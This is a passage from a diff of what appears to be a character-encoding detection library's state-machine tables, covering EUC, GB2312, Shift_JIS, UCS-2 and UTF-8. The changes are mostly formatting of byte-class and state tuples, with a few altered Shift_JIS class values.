eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27
)
EUCJPCharLenTable = (2, 2, 2, 3, 1, 0)
@ -129,43 +173,45 @@ EUCJPSMModel = {'classTable': EUCJP_cls,
# EUC-KR
EUCKR_cls = ( \
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,3,3,3, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,3,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,0) # f8 - ff
EUCKR_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,3,3,3, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,3,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,0 # f8 - ff
)
EUCKR_st = (
eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart)#08-0f
eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f
)
EUCKRCharLenTable = (0, 1, 2, 0)
@ -177,47 +223,49 @@ EUCKRSMModel = {'classTable': EUCKR_cls,
# EUC-TW
EUCTW_cls = ( \
2,2,2,2,2,2,2,2, # 00 - 07
2,2,2,2,2,2,0,0, # 08 - 0f
2,2,2,2,2,2,2,2, # 10 - 17
2,2,2,0,2,2,2,2, # 18 - 1f
2,2,2,2,2,2,2,2, # 20 - 27
2,2,2,2,2,2,2,2, # 28 - 2f
2,2,2,2,2,2,2,2, # 30 - 37
2,2,2,2,2,2,2,2, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,2, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,6,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,3,4,4,4,4,4,4, # a0 - a7
5,5,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,3,1,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0) # f8 - ff
EUCTW_cls = (
2,2,2,2,2,2,2,2, # 00 - 07
2,2,2,2,2,2,0,0, # 08 - 0f
2,2,2,2,2,2,2,2, # 10 - 17
2,2,2,0,2,2,2,2, # 18 - 1f
2,2,2,2,2,2,2,2, # 20 - 27
2,2,2,2,2,2,2,2, # 28 - 2f
2,2,2,2,2,2,2,2, # 30 - 37
2,2,2,2,2,2,2,2, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,2, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,6,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,3,4,4,4,4,4,4, # a0 - a7
5,5,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,3,1,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
EUCTW_st = ( \
eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f
EUCTW_st = (
eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3)
@ -229,53 +277,55 @@ EUCTWSMModel = {'classTable': EUCTW_cls,
# GB2312
GB2312_cls = ( \
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
3,3,3,3,3,3,3,3, # 30 - 37
3,3,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,4, # 78 - 7f
5,6,6,6,6,6,6,6, # 80 - 87
6,6,6,6,6,6,6,6, # 88 - 8f
6,6,6,6,6,6,6,6, # 90 - 97
6,6,6,6,6,6,6,6, # 98 - 9f
6,6,6,6,6,6,6,6, # a0 - a7
6,6,6,6,6,6,6,6, # a8 - af
6,6,6,6,6,6,6,6, # b0 - b7
6,6,6,6,6,6,6,6, # b8 - bf
6,6,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
6,6,6,6,6,6,6,6, # e0 - e7
6,6,6,6,6,6,6,6, # e8 - ef
6,6,6,6,6,6,6,6, # f0 - f7
6,6,6,6,6,6,6,0) # f8 - ff
GB2312_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
3,3,3,3,3,3,3,3, # 30 - 37
3,3,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,4, # 78 - 7f
5,6,6,6,6,6,6,6, # 80 - 87
6,6,6,6,6,6,6,6, # 88 - 8f
6,6,6,6,6,6,6,6, # 90 - 97
6,6,6,6,6,6,6,6, # 98 - 9f
6,6,6,6,6,6,6,6, # a0 - a7
6,6,6,6,6,6,6,6, # a8 - af
6,6,6,6,6,6,6,6, # b0 - b7
6,6,6,6,6,6,6,6, # b8 - bf
6,6,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
6,6,6,6,6,6,6,6, # e0 - e7
6,6,6,6,6,6,6,6, # e8 - ef
6,6,6,6,6,6,6,6, # f0 - f7
6,6,6,6,6,6,6,0 # f8 - ff
)
GB2312_st = ( \
eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f
GB2312_st = (
eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validing
# each code range there as well. So it is safe to set it to be
# 2 here.
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validing
# each code range there as well. So it is safe to set it to be
# 2 here.
GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2)
GB2312SMModel = {'classTable': GB2312_cls,
@ -286,46 +336,48 @@ GB2312SMModel = {'classTable': GB2312_cls,
# Shift_JIS
SJIS_cls = ( \
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
3,3,3,3,3,3,3,3, # 80 - 87
3,3,3,3,3,3,3,3, # 88 - 8f
3,3,3,3,3,3,3,3, # 90 - 97
3,3,3,3,3,3,3,3, # 98 - 9f
#0xa0 is illegal in sjis encoding, but some pages does
SJIS_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
3,3,3,3,3,2,2,3, # 80 - 87
3,3,3,3,3,3,3,3, # 88 - 8f
3,3,3,3,3,3,3,3, # 90 - 97
3,3,3,3,3,3,3,3, # 98 - 9f
#0xa0 is illegal in sjis encoding, but some pages does
#contain such byte. We need to be more error forgiven.
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,4,4,4, # e8 - ef
4,4,4,4,4,4,4,4, # f0 - f7
4,4,4,4,4,0,0,0) # f8 - ff
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,4,4,4, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,0,0,0) # f8 - ff
SJIS_st = ( \
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart)#10-17
SJIS_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17
)
SJISCharLenTable = (0, 1, 1, 2, 0, 0)
@ -337,48 +389,50 @@ SJISSMModel = {'classTable': SJIS_cls,
# UCS2-BE
UCS2BE_cls = ( \
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5) # f8 - ff
UCS2BE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2BE_st = ( \
5, 7, 7,eError, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
6, 6, 6, 6, 5, 7, 7,eError,#20-27
5, 8, 6, 6,eError, 6, 6, 6,#28-2f
6, 6, 6, 6,eError,eError,eStart,eStart)#30-37
UCS2BE_st = (
5, 7, 7,eError, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
6, 6, 6, 6, 5, 7, 7,eError,#20-27
5, 8, 6, 6,eError, 6, 6, 6,#28-2f
6, 6, 6, 6,eError,eError,eStart,eStart #30-37
)
UCS2BECharLenTable = (2, 2, 2, 0, 2, 2)
@ -390,48 +444,50 @@ UCS2BESMModel = {'classTable': UCS2BE_cls,
# UCS2-LE
UCS2LE_cls = ( \
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5) # f8 - ff
UCS2LE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2LE_st = ( \
6, 6, 7, 6, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
5, 5, 5,eError, 5,eError, 6, 6,#18-1f
7, 6, 8, 8, 5, 5, 5,eError,#20-27
5, 5, 5,eError,eError,eError, 5, 5,#28-2f
5, 5, 5,eError, 5,eError,eStart,eStart)#30-37
UCS2LE_st = (
6, 6, 7, 6, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
5, 5, 5,eError, 5,eError, 6, 6,#18-1f
7, 6, 8, 8, 5, 5, 5,eError,#20-27
5, 5, 5,eError,eError,eError, 5, 5,#28-2f
5, 5, 5,eError, 5,eError,eStart,eStart #30-37
)
UCS2LECharLenTable = (2, 2, 2, 2, 2, 2)
@ -443,67 +499,69 @@ UCS2LESMModel = {'classTable': UCS2LE_cls,
# UTF-8
UTF8_cls = ( \
UTF8_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
2,2,2,2,3,3,3,3, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
5,5,5,5,5,5,5,5, # a0 - a7
5,5,5,5,5,5,5,5, # a8 - af
5,5,5,5,5,5,5,5, # b0 - b7
5,5,5,5,5,5,5,5, # b8 - bf
0,0,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
7,8,8,8,8,8,8,8, # e0 - e7
8,8,8,8,8,9,8,8, # e8 - ef
10,11,11,11,11,11,11,11, # f0 - f7
12,13,13,13,14,15,0,0) # f8 - ff
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
2,2,2,2,3,3,3,3, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
5,5,5,5,5,5,5,5, # a0 - a7
5,5,5,5,5,5,5,5, # a8 - af
5,5,5,5,5,5,5,5, # b0 - b7
5,5,5,5,5,5,5,5, # b8 - bf
0,0,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
7,8,8,8,8,8,8,8, # e0 - e7
8,8,8,8,8,9,8,8, # e8 - ef
10,11,11,11,11,11,11,11, # f0 - f7
12,13,13,13,14,15,0,0 # f8 - ff
)
UTF8_st = ( \
eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
9, 11, 8, 7, 6, 5, 4, 3,#08-0f
eError,eError,eError,eError,eError,eError,eError,eError,#10-17
eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
eError,eError, 5, 5, 5, 5,eError,eError,#30-37
eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
eError,eError,eError, 5, 5, 5,eError,eError,#40-47
eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
eError,eError, 7, 7, 7, 7,eError,eError,#50-57
eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
eError,eError,eError,eError, 7, 7,eError,eError,#60-67
eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
eError,eError, 9, 9, 9, 9,eError,eError,#70-77
eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
eError,eError,eError,eError,eError, 9,eError,eError,#80-87
eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
eError,eError, 12, 12, 12, 12,eError,eError,#90-97
eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
